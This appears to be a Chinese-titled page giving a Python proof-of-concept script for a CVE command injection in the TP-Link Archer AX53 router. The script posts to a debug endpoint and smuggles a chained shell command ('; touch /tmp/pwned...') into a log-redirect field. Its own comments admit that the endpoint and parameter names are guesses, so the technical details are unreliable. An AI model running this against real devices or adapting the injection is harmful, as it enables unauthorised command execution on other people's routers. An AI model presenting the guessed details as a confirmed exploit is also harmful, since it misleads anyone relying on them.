CVE-2025-15607 TP-Link AX53命令注入漏洞

import requests # PoC for CVE-2025-15607: Command Injection in TP-Link AX53 # This script demonstrates how an attacker might exploit the mscd debug functionality. # Target: TP-Link Archer AX53 v1 def exploit(target_ip): # The vulnerable endpoint is typically a debug interface url = f"http://{target_ip}/debug/mscd" # Payload injects a command to create a file as proof of execution # Based on the description, the input allows log redirection and command concatenation # ; or && characters are often used to chain commands in shell injection injection_payload = "; touch /tmp/pwned_by_cve_2025_15607" # The vulnerable parameter might be related to log file path or debug settings # Assuming 'log_path' or similar parameter triggers the vulnerability data = { "enable_debug": "true", "log_redirect": f"/var/log/mscd.log {injection_payload}" } try: print(f"[*] Sending payload to {target_ip}...") response = requests.post(url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if command executed.") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") if __name__ == "__main__": # Replace with the actual IP address of the target device target = "192.168.0.1" exploit(target)